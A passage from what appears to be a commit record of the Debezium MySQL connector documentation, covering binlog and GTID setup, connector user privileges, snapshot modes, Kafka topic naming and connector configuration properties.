This behaviour is unlike the InnoDB engine, which acquires row-level locks.\n\n|`snapshot.minimal.locks` +\n_deprecated since 0.7.3_\n|`true`\n|Controls how long the connector holds onto the global MySQL read lock (preventing any updates to the database) while it is performing a snapshot. The default is `true`, meaning the connector holds the global read lock for just the initial portion of the snapshot while the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table, and this can be done in a consistent fashion using the `REPEATABLE READ` transaction even when the global read lock is no longer held and while other\nMySQL clients are updating the database. However, in some cases where clients are submitting operations that MySQL excludes from `REPEATABLE READ` semantics, it may be desirable to _block all writes_ for the entire duration of the snapshot. Only in such cases should you set this property to `false`. +\n_Deprecated:_ This option has been deprecated and replaced with the `snapshot.locking.mode` configuration option. This option will be removed in a future release. +\n\nA `snapshot.minimal.locks` value of `true` should be replaced with `snapshot.locking.mode` set to `minimal`. +\n\nA `snapshot.minimal.locks` value of `false` should be replaced with `snapshot.locking.mode` set to `extended`.\n\n|`snapshot.select.statement.overrides` +\n0.7.0 and later\n|\n|Controls which rows from tables will be included in the snapshot. +\nThis property contains a comma-separated list of fully-qualified tables _(DB_NAME.TABLE_NAME)_. Select statements for the individual tables are specified in further configuration properties, one for each table, identified by the id `snapshot.select.statement.overrides.[DB_NAME].[TABLE_NAME]`. The value of those properties is the SELECT statement to use when retrieving data from the specific table during snapshotting. _A possible use case for large append-only tables is setting a specific point at which to start (resume) snapshotting, in case a previous snapshotting was interrupted_ (see the sketch after this table). +\n*Note*: This setting affects snapshots only. Events captured from the binlog are not affected by it at all.\n\n|`min.row.count.to.stream.results`\n|`1000`\n|During a snapshot operation, the connector will query each included table to produce a read event for all rows in that table. This parameter determines whether the MySQL connection will pull all results for a table into memory (which is fast but requires large amounts of memory), or whether the results will instead be streamed (can be slower, but will work for very large tables). The value specifies the minimum number of rows a table must contain before the connector will stream results, and defaults to 1,000. Set this parameter to `0` to skip all table size checks and always stream all results during a snapshot.\n\n|`heartbeat.interval.ms` +\n0.7.3 and later\n|`0`\n|Controls how frequently the heartbeat messages are sent. +\nThis property contains an interval in milliseconds that defines how frequently the connector sends heartbeat messages into a heartbeat topic.\nSet this parameter to `0` to not send heartbeat messages at all. +\nDisabled by default.\n\n|`heartbeat.topics.prefix` +\n0.7.3 and later\n|`__debezium-heartbeat`\n|Controls the naming of the topic to which heartbeat messages are sent. +\nThe topic is named according to the pattern `<heartbeat.topics.prefix>.<server.name>`.\n\n|`database.initial.statements` +\n0.8.0 and later\n|\n|A semicolon-separated list of SQL statements to be executed when a JDBC connection (not the transaction log reading connection) to the database is established.\nUse a doubled semicolon (';;') to use a semicolon as a character and not as a delimiter. +\n_Note: The connector may establish JDBC connections at its own discretion, so this should typically be used for configuration of session parameters only, but not for executing DML statements._\n\n|`snapshot.delay.ms` +\n0.8.0 and later\n|\n|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +\nCan be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.\n\n|`snapshot.fetch.size` +\n0.9.5 and later\n|\n|Specifies the maximum number of rows that should be read in one go from each table while taking a snapshot.\nThe connector will read the table contents in multiple batches of this size.\n\n|`enable.time.adjuster` +\n0.9.3 and later\n|\n|MySQL allows users to insert year values as either 2-digit or 4-digit.\nIn the case of two digits the value is automatically mapped into the 1970 - 2069 range.\nThis is usually done by the database. +\nSet to `true` (the default) when Debezium should do the conversion. +\nSet to `false` when the conversion is fully delegated to the database.\n|=======================\n
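\nAs an example of the `snapshot.select.statement.overrides` mechanism, the following sketch resumes an interrupted snapshot of a large append-only table. The table name reuses the `inventory.orders` example that appears later in this document, and the predicate value is hypothetical:\n\n[source,indent=0]\n----\n# Only the tables listed here have their snapshot SELECT overridden\nsnapshot.select.statement.overrides=inventory.orders\n# Hypothetical resume point: only rows added after id 41000 are snapshotted\nsnapshot.select.statement.overrides.inventory.orders=SELECT * FROM inventory.orders WHERE id > 41000\n----\n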
\nThe connector also supports _pass-through_ configuration properties that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history, and all those that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector startup.\n\nFor example, the following connector configuration properties can be used to http:\/\/kafka.apache.org\/documentation.html#security_configclients[secure connections to the Kafka broker]:\n\n[source,indent=0]\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nIn addition to the _pass-through_ to the Kafka producer and consumer, the properties starting with `database.`, e.g. `database.tinyInt1isBit=false`, are passed to the JDBC URL.\n
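\nTo make the prefix handling concrete, here is a small sketch; `acks` is an arbitrary Kafka producer setting chosen purely for illustration, and the JDBC parameter is the example mentioned above:\n\n[source,indent=0]\n----\n# Passed (without the prefix) to the Kafka producer that writes the database history, i.e. acks=1\ndatabase.history.producer.acks=1\n# Appended as a parameter to the JDBC URL, i.e. tinyInt1isBit=false\ndatabase.tinyInt1isBit=false\n----\n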
\nBe sure to consult the http:\/\/kafka.apache.org\/documentation.html[Kafka documentation] for all of the configuration properties for Kafka producers and consumers. (The MySQL connector does use the http:\/\/kafka.apache.org\/documentation.html#newconsumerconfigs[new consumer].)\n","old_contents":"= Debezium Connector for MySQL\n:awestruct-layout: doc\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n\ntoc::[]\n\nDebezium's MySQL Connector can monitor and record all of the row-level changes in the databases on a MySQL server or HA MySQL cluster. The first time it connects to a MySQL server\/cluster, it reads a consistent snapshot of all of the databases. When that snapshot is complete, the connector continuously reads the changes that were committed to MySQL 5.6 or later and generates corresponding insert, update and delete events. All of the events for each table are recorded in a separate Kafka topic, where they can be easily consumed by applications and services.\n\nAs of Debezium 0.4.0, this connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. However, due to limitations of these hosted forms of MySQL, the connector retains locks during an initial consistent snapshot link:#snapshots-without-global-read-locks[for the duration of the snapshot].\n\n[[overview]]\n== Overview\n\nMySQL's http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/binary-log.html[_binary log_], or _binlog_, records all operations in the same order they are committed by the database, including changes to the schemas of tables or changes to data stored within the tables. MySQL uses its binlog for replication and recovery.\n\nDebezium's MySQL connector reads MySQL's binary log to understand what and in what order data has changed. It then produces a _change event_ for every row-level insert, update, and delete operation in the binlog, recording all the change events for each table in a separate Kafka topic. Your client applications read the Kafka topics that correspond to the database tables they're interested in following, and react to every row-level event they see in those topics.\n\nMySQL is usually set up to purge the binary logs after some period of time. This means that the binary log won't have the complete history of all changes that have been made to the database. Therefore, when the MySQL connector first connects to a particular MySQL server or cluster, it starts by performing a link:#snapshot[_consistent snapshot_] of each of the databases. When the connector completes the snapshot, it then starts reading the binlog from the exact point at which the snapshot was made. This way, we start with a consistent view of all of the data, yet continue reading without having lost any of the changes made while the snapshot was taking place.\n\nThe connector is also very tolerant of failures. As the connector reads the binlog and produces events, it records the binlog position with each event. If the connector stops for any reason (including communication failures, network problems, or crashes), upon restart it simply continues reading the binlog where it last left off. This includes snapshots: if the snapshot was not completed when the connector was stopped, upon restart it will begin a new snapshot. 
We'll talk later about how the connector behaves link:#when-things-go-wrong[when things go wrong].\n\n\n[[setting-up-mysql]]\n== Setting up MySQL\n\nBefore the Debezium MySQL connector can be used to monitor the changes committed on a MySQL server, the server must be set up to use _row-level binary logging_ and have a database user with appropriate privileges. If MySQL is configured to use global transaction identifiers (GTIDs), then the Debezium connector can more easily reestablish connection should one of the MySQL servers fail.\n\nThe following sections outline in more detail how to set up these features in MySQL.\n\n[[enabling-the-binlog]]\n=== Enabling the binlog\n\nThe MySQL server must be configured to use a _row-level_ binary log, which is described in more detail in the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options.html[MySQL documentation]. This is most often done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nserver-id = 223344\nlog_bin = mysql-bin\nbinlog_format = row\nbinlog_row_image = full\nexpire_logs_days = 10\n----\n\nwhere:\n\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_server_id[`server-id`] must be unique for each server and replication client within the MySQL cluster. When we set up the connector, we'll also assign the connector a unique server ID.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_log_bin[`log_bin`] is the base name for the sequence of binlog files.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_format[`binlog_format`] must be set to `row` or `ROW`.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_row_image[`binlog_row_image`] must be set to `full` or `FULL`.\n* the value for http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/server-system-variables.html#sysvar_expire_logs_days[`expire_logs_days`] is the number of days for automatic binary log file removal. The default is 0, which means \"no automatic removal,\" so be sure to set a value that is appropriate for your environment.\n\n[TIP]\n====\nRunning a MySQL server with binary logging enabled does slightly reduce performance of the MySQL server, but the benefits generally outweigh the costs. Each binlog reader will also place a small load on the server, so using Debezium is a great way to minimize this load while providing the change events to a large variety and number of consumers.\n====\n
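\nAfter restarting MySQL with these settings, you can verify that they took effect; a quick sanity check from any MySQL client session (the expected values in the comments assume the fragment above):\n\n[source,sql,indent=0]\n----\nSHOW VARIABLES LIKE 'binlog_format';    -- expect: ROW\nSHOW VARIABLES LIKE 'binlog_row_image'; -- expect: FULL\n----\n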
\n[[enabling-gtids]]\n[[enabling-gtids-optional]]\n=== Enabling GTIDs (optional)\n\nThe MySQL server can be configured to use https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-gtids.html[GTID-based replication]. Global transaction identifiers, or GTIDs, were introduced in MySQL 5.6.5, and they uniquely identify a transaction that occurred on a particular server within a cluster. Using GTIDs greatly simplifies replication and makes it possible to easily confirm whether masters and slaves are consistent. *Note that if you're using an earlier version of MySQL, you will not be able to enable GTIDs.*\n\nEnabling GTIDs can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\ngtid_mode = on\nenforce_gtid_consistency = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[`gtid_mode`] specifies the GTID mode of the MySQL server.\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html[`enforce_gtid_consistency`] instructs the server to enforce GTID consistency by allowing execution of only those statements that can be logged in a transactionally safe manner, and is required when using GTIDs.\n\nConsult the https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/replication-options-gtids.html#option_mysqld_gtid-mode[MySQL documentation] for details and specifics about setting up GTIDs.\n\n[TIP]\n====\nThe MySQL connector does not require MySQL to use GTIDs and GTID-based replication. Each time the connector starts up, it will automatically detect whether GTIDs are enabled and adjust its behavior accordingly.\n====\n\n[[enabling-query-log-events]]\n[[enabling-query-log-events-optional]]\n=== Enabling Query Log Events (optional)\n\nStarting with MySQL 5.6, row-based replication can be configured to include the original SQL statement with each binlog event. *Note that if you're using an earlier version of MySQL, you will not be able to enable this feature.*\n\nEnabling this option can be done in the MySQL server configuration file, and will look similar to the following fragment:\n\n[source]\n----\nbinlog_rows_query_log_events = on\n----\n\nwhere:\n\n* the value for https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-options-binary-log.html#sysvar_binlog_rows_query_log_events[`binlog_rows_query_log_events`] can be set to `on` or `ON` to enable support for including the original SQL statement in the binlog entry.\n\n[[mysql-user]]\n[[create-a-mysql-user-for-the-connector]]\n=== Create a MySQL user for the connector\n\nA MySQL user must be defined that has all of the following permissions on all of the databases that the connector will monitor:\n\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_select[`SELECT`] - enables the connector to select rows from tables in databases; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_reload[`RELOAD`] - enables the connector to use the http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/flush.html[`FLUSH`] statement to clear or reload various internal caches, flush tables, or acquire locks; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_show-databases[`SHOW DATABASES`] - enables the connector to see database names by issuing the `SHOW DATABASES` statement; used only when performing a snapshot\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-slave[`REPLICATION SLAVE`] - enables the connector to connect to and read the binlog of its MySQL server; always required for the connector\n* http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/privileges-provided.html#priv_replication-client[`REPLICATION CLIENT`] - enables the use of `SHOW MASTER STATUS`, `SHOW SLAVE STATUS`, and `SHOW BINARY LOGS`; always required for the connector\n
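\nDepending on your MySQL version, the account may need to exist before privileges can be granted to it (recent MySQL releases no longer support creating a user implicitly via `GRANT ... IDENTIFIED BY`). A sketch, using a hypothetical Kafka Connect host:\n\n[source,sql,indent=0]\n----\n-- The host restriction 'connect.host.acme.com' is illustrative; see the warning below\nCREATE USER 'debezium'@'connect.host.acme.com' IDENTIFIED BY 'dbz';\n----\n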
\nFor example, the following statement grants these permissions for a user `debezium` that authenticates with the password `dbz`, where the user can be on any machine:\n\n GRANT SELECT, RELOAD, SHOW DATABASES, REPLICATION SLAVE, REPLICATION CLIENT ON *.* TO 'debezium' IDENTIFIED BY 'dbz';\n\n[WARNING]\n====\nChoose a good password that is different from what we use above.\n\nAlso, the above grant is equivalent to specifying any authenticating client on _any_ host, so obviously this is not recommended for production. Instead, in production you would almost certainly limit the replication user to the machine(s) where the MySQL connector is running within a Kafka Connect service, such as `... 'debezium'@'connect.host.acme.com' ...`.\n====\n\n[IMPORTANT]\n====\nWhen using the MySQL connector with https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS], https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], or any other server where the connector's database user is unable to obtain a global read lock, the database user must also have the `LOCK TABLES` permission. See the section on link:#snapshots-without-global-read-locks[snapshots without global read locks] and https:\/\/issues.jboss.org\/projects\/DBZ\/issues\/DBZ-140[DBZ-140] for additional details.\n====\n\n[[supported-mysql-topologies]]\n== Supported MySQL topologies\n\nThe MySQL connector can be used with a variety of MySQL topologies.\n\n[[mysql-standalone]]\n=== MySQL standalone\n\nWhen a single MySQL server is used by itself, then that server must have the binlog enabled (and optionally GTIDs enabled) so that the MySQL connector can monitor it. This is often acceptable, since the binary log can also be used as an http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/backup-methods.html[incremental backup]. In this case, the MySQL connector will always connect to and follow this standalone MySQL server instance.\n\n[[mysql-master-and-slave]]\n=== MySQL master and slave\n\nhttp:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/replication-solutions.html[MySQL replication] can be used to set up a cluster of MySQL instances, where one of the MySQL server instances is considered the _master_ and the other(s) a _slave_. Topologies can include a single master with a single slave, a single master with multiple slaves, and multiple masters with multiple slaves. Which you choose will depend on your requirements, your backup and recovery strategy, and how you are scaling MySQL to handle large data volumes and queries.\n\nTo use the MySQL connector with one of these topologies, the connector can follow one of the masters or one of the slaves (if that slave has its binlog enabled), but the connector will see only those changes in the cluster that are visible to that server. Generally, this is not a problem except for the multi-master topologies.\n\nThe connector records its position in the server's binlog, which is different on each server in the cluster. Therefore, the connector will need to follow just one MySQL server instance. If that server fails, it must be restarted or recovered before the connector can continue.\n\n[[mysql-clusters]]\n[[highly-available-mysql-clusters]]\n=== Highly Available MySQL clusters\n\nA https:\/\/dev.mysql.com\/doc\/mysql-ha-scalability\/en\/[variety of high availability solutions] exist for MySQL, and they make it far easier to tolerate and almost immediately recover from problems and failures. 
Most HA MySQL clusters use GTIDs so that slaves are able to keep track of all changes on any of the masters.\n\n\n[[multi-master-mysql]]\n=== Multi-Master MySQL\n\nA https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/mysql-cluster-replication-multi-master.html[multi-master MySQL] topology uses one or more MySQL slaves that each replicate from _multiple_ masters. This is a powerful way to aggregate the replication of multiple MySQL clusters, and requires using GTIDs.\n\nAs of Debezium 0.3.5, the Debezium MySQL connector can use these multi-master MySQL slaves as sources, and can fail over to _different_ multi-master MySQL slaves as long as the new slave has caught up to the old slave (e.g., the new slave has all of the transactions that were last seen on the first slave). This works even if the connector is only using a subset of databases and\/or tables, as the connector can be configured to include or exclude specific GTID sources when attempting to reconnect to a new multi-master MySQL slave and find the correct position in the binlog.\n\n[[hosted-mysql]]\n=== Hosted MySQL\n\nAs of Debezium 0.4.0, the MySQL connector adds preliminary support for https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)]. The connector works as usual when reading the binlog, but in these environments the link:#snapshots-without-global-read-locks[connector does perform snapshots differently]. This is because these hosted forms of MySQL prevent database users from being able to obtain a global read lock, so the only way for the connector to obtain a consistent snapshot is to use table-level locks instead. Unfortunately, table-level locks link:https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[affect current transactions], and this means that the locks cannot be released until after the connector completes reading all data and commits its transaction.\n\n\n[[how-it-works]]\n[[how-the-mysql-connector-works]]\n== How the MySQL connector works\n\nThis section goes into detail about how the MySQL connector tracks the structure of the tables, performs snapshots, and transforms binlog events into Debezium change events; where those events are recorded in Kafka; and how the connector behaves when things go wrong.\n\n[[database-schema-history]]\n=== Database schema history\n\nWhen a database client queries a database, it uses the database's current schema. However, the database schema can be changed at any time, which means that the connector must know what the schema looked like at the time each insert, update, or delete operation is _recorded_. It can't just use the current schema, either, since it may be processing events that are relatively old and may have been recorded before the tables' schemas were changed. Luckily, MySQL includes in the binlog the row-level changes to the data _and_ the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table's schema, which is then used to understand the structure of the tables at the time each insert, update, or delete occurs and to produce the appropriate change event. 
It also records in a separate _database history_ Kafka topic all of the DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector will start reading the binlog from a specific position (i.e., a specific point in time). The connector rebuilds the table structures that existed _at this point in time_ by reading the database history Kafka topic and parsing all DDL statements up until the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only, but the connector can optionally generate _schema change events_ on a different topic that is intended for consumer applications. We'll cover this in the link:#schema-change-topic[Schema Change Topic] section.\n\n[NOTE]\n====\nIt is vital that there is a global order of the events in the database schema history; therefore, the database history topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\n[[snapshots]]\n=== Snapshots\n\nWhen a MySQL connector that is configured to follow a MySQL server instance is first started, it will by default perform an initial _consistent snapshot_ of a database. This is the default mode, since much of the time the MySQL binlogs no longer contain the complete history of the database.\n\nThe connector performs the following steps each time it takes a snapshot:\n\n1. Grab a global read lock that blocks writes by other database clients.\n2. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n3. Read the current position of the binlog.\n4. Read the schema of the databases and tables allowed by the connector's configuration.\n5. Release the global read lock, allowing other DB clients to again write to the database.\n6. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements.\n7. Scan all of the database tables and generate, on the appropriate table-specific Kafka topics, `CREATE` events for each row.\n8. Commit the transaction.\n9. Record in the connector offsets that the connector successfully completed the snapshot.\n\nThe transaction started in step 2 does not prevent other clients from making changes to the table rows, but will instead provide the connector with a consistent and unchanging view of the data in the tables. However, the transaction does not prevent other clients from applying DDL, which could interfere with the connector's attempt to read the binlog position and the table schemas. So, the connector obtains a global read lock in step 1 to prevent such problems, and it keeps this lock for a very short period of time while it reads the binlog position and table schemas in steps 3 and 4. This global read lock is released in step 5, before the connector performs the bulk of the work of copying the data.\n\nIf the connector fails, is rebalanced, or stops before the snapshot is complete, the connector will begin a new snapshot when it is restarted. 
Once the connector does complete its initial snapshot, the MySQL connector then proceeds to read the binlog from the position read during step 3, ensuring that the connector does not miss any updates. If the connector stops again for any reason, upon restart it will simply continue reading the binlog where it previously left off. However, if the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will fail with an error.\n\nA second snapshot mode allows the connector to perform snapshots _whenever necessary_. This behavior is similar to the default _initial_ snapshot behavior mentioned above, with one exception: if the connector is restarted _and_ MySQL no longer has its starting point in the binlog, rather than failing the connector will instead perform another snapshot. This mode is perhaps the most automated, but at the risk of performing additional snapshots when things go wrong (generally when the connector is down too long).\n\nThe third snapshot mode ensures the connector _never_ performs snapshots. When a new connector is configured this way, it will start reading the binlog from the beginning. This is not the default behavior because starting a new connector in this mode (without a snapshot) requires that the MySQL binlog contain the entire history of all monitored databases, and MySQL instances are rarely configured this way. Specifically, the binlog must contain at least the `CREATE TABLE ...` statement for every monitored table. If this requirement is not satisfied, the connector will not be able to properly interpret the structure of the low-level events in the binlog, and it will simply skip all events for those missing table definitions. (The connector cannot rely upon the current definition of those tables, since the tables may have been altered after the initial events were recorded in the binlog, preventing the connector from properly interpreting the binlog events.)\n\nAs of 0.3.4, a fourth snapshot mode allows the connector to start reading the MySQL binlog from its current position when the connector is started. With the `schema_only` mode the connector reads the current binlog position, captures the current table schemas without reading any data, and then proceeds to read the binlog from its current position. This happens very quickly, and the resulting change event streams include only those change events that occurred *after the snapshot started*. This may be useful for consumers that don't need to know the complete state of the database but only need to know the changes that were made since the connector was started.\n\nAs of 0.7.2, a fifth snapshot mode `schema_only_recovery` allows an existing connector to recover a corrupted or lost database history topic. It behaves similarly to `schema_only`, in that it captures the current table schemas without reading any data. The differences are:\n\n* It can only be used on an existing connector, as an update to the connector's configuration.\n* It begins reading the binlog at the last committed offset for this existing connector, rather than the binlog's current position.\n\n`schema_only_recovery` can also be used to periodically \"clean up\" a database history topic (which requires infinite retention) that may be growing unexpectedly. 
To do this, the database history topic must be manually deleted before updating the connector's snapshot mode to `schema_only_recovery`.\nNote that this mode is safe to use *only* if no schema changes have happened after the committed offset.\nOtherwise, the binlog events between the committed offset and the binlog position with the schema change will be emitted with an inconsistent schema\n(already based on the altered schema, which did not yet apply to these earlier events).\nIt is therefore recommended -- once recovery of the history topic has succeeded -- to return to one of the other snapshotting modes, to prevent further snapshots after subsequent restarts of the connector.\n\nBecause of how the connector records offsets when performing a snapshot, the connector now defaults to `include.schema.changes=true`. This writes all DDL changes performed during a snapshot to a topic that can be consumed by apps. And, more importantly, during the final step mentioned above it ensures that the updated offsets are recorded immediately (rather than waiting until a database change occurs).\n\n[[snapshots-without-global-read-locks]]\n==== Snapshots without global read locks\n\nSome MySQL environments, including https:\/\/aws.amazon.com\/rds\/mysql\/[Amazon RDS] and https:\/\/aws.amazon.com\/rds\/aurora\/[Amazon Aurora (MySQL compatibility)], do not allow users to obtain global read locks. As of 0.4.0, when the MySQL connector detects that a global read lock is not allowed, it falls back to table-level locks (requiring that the database user also has the `LOCK TABLES` privilege) and performs a snapshot using these steps:\n\n1. Start a transaction with https:\/\/dev.mysql.com\/doc\/refman\/5.6\/en\/innodb-consistent-read.html[_repeatable read_ semantics] to ensure that all subsequent reads within this transaction are done against a single consistent snapshot.\n2. Fail to obtain a global read lock to block writes by other database clients.\n3. Read names of the databases and tables, filtering them using the connector's configuration.\n4. Acquire a table-level lock on all configured tables.\n5. Read the current position of the binlog.\n6. Read the schema of all configured databases and tables.\n7. Optionally write the DDL changes to the _schema change topic_, including all necessary `DROP ...` and `CREATE ...` DDL statements.\n8. Scan all of the database tables and generate, on the appropriate table-specific Kafka topics, `CREATE` events for each row.\n9. Commit the transaction.\n10. Release the table-level locks.\n11. Record in the connector offsets that the connector successfully completed the snapshot.\n\nNote that the _table-level locks are held for nearly all of the consistent snapshot_, including the reading of all database table content in step 8. This is very different than when a global read lock can be used, since that is held for a very short period of time. Unfortunately, this is the only way that the MySQL connector can obtain a consistent snapshot, since https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/lock-tables-and-transactions.html[releasing the table-level locks implicitly commits any open transaction held by the session]. 
Since we need the transaction to obtain a consistent snapshot of the database content, we are unable to release the table-level locks until after we've read the data in step 8 and committed our transaction in step 9.\n\n\n\n[[reading-the-binlog]]\n=== Reading the MySQL binlog\n\nThe MySQL connector will typically spend the vast majority of its time reading the binlog of the MySQL server to which it is connected.\n\nAs the MySQL connector reads the binlog, it transforms the binary log events into Debezium _create_, _update_, or _delete_ events that include the position in the binlog (including GTIDs if they are used) where the event was found. The MySQL connector forwards these change events to the Kafka Connect framework (running in the same process), which then synchronously writes them to the appropriate Kafka topic. Kafka Connect uses the term _offset_ for the source-specific position information that Debezium includes with each event, and Kafka Connect periodically records the most recent offset in another Kafka topic.\n\nWhen Kafka Connect gracefully shuts down, it stops the connectors, flushes all events to Kafka, and records the last offset received from each connector. Upon restart, Kafka Connect reads the last recorded offset for each connector, and starts the connector from that point. The MySQL connector uses the binlog filename, the position in that file, and the GTIDs (if they are enabled in the MySQL server) recorded in its offset to request that MySQL send it the binlog events starting just after that position.\n\n[[topic-names]]\n=== Topic names\n\nThe MySQL connector writes events for all insert, update, and delete operations on a single table to a single Kafka topic. The names of the Kafka topics always take the form _serverName_._databaseName_._tableName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property, _databaseName_ is the name of the database where the operation occurred, and _tableName_ is the name of the database table on which the operation occurred.\n\nFor example, consider a MySQL installation with an `inventory` database that contains four tables: `products`, `products_on_hand`, `customers`, and `orders`. If the connector monitoring this database were given a logical server name of `fulfillment`, then the connector would produce events on these four Kafka topics:\n\n* `fulfillment.inventory.products`\n* `fulfillment.inventory.products_on_hand`\n* `fulfillment.inventory.customers`\n* `fulfillment.inventory.orders`\n\n[[schema-change-topic]]\n=== Schema change topic\n\nIt is often useful for applications to consume events that describe the changes in the database schemas, so the MySQL connector can be configured to produce _schema change events_ with all of the DDL statements applied to databases in the MySQL server. When enabled, the connector writes all such events to a Kafka topic named _serverName_, where _serverName_ is the logical name of the connector as specified with the `database.server.name` configuration property. In our previous example where the logical server name is `fulfillment`, the schema change events would be recorded in the topic `fulfillment`.\n\n[IMPORTANT]\n====\nThe link:#database-schema-history[database history topic] and _schema change topic_ both contain events with the DDL statement. However, we've designed the events on the schema change topic to be easier to consume, so they are more granular and always have the database name. 
If you're going to consume schema change events, be sure to use the schema change topic and _never_ consume the database history topic.\n====\n\n[NOTE]\n====\nIn order to keep the correct order of schema changes, the schema change topic must not be partitioned.\nThis means a partition count of 1 must be specified when creating this topic.\nWhen relying on auto topic creation, make sure that Kafka's `num.partitions` configuration option (the default number of partitions) is set to 1.\n====\n\nEach message written to the schema change topic will have a message key that contains the name of the database the client was connected to and using when it applied the DDL statement(s):\n\n[source,json,indent=0]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n }\n----\n\nMeanwhile, the schema change event message's value will contain a structure containing the DDL statement(s), the database to which the statements were _applied_, and the position in the binlog where the statement(s) appeared:\n\n[source,json,indent=0,subs=\"attributes\"]\n----\n {\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n 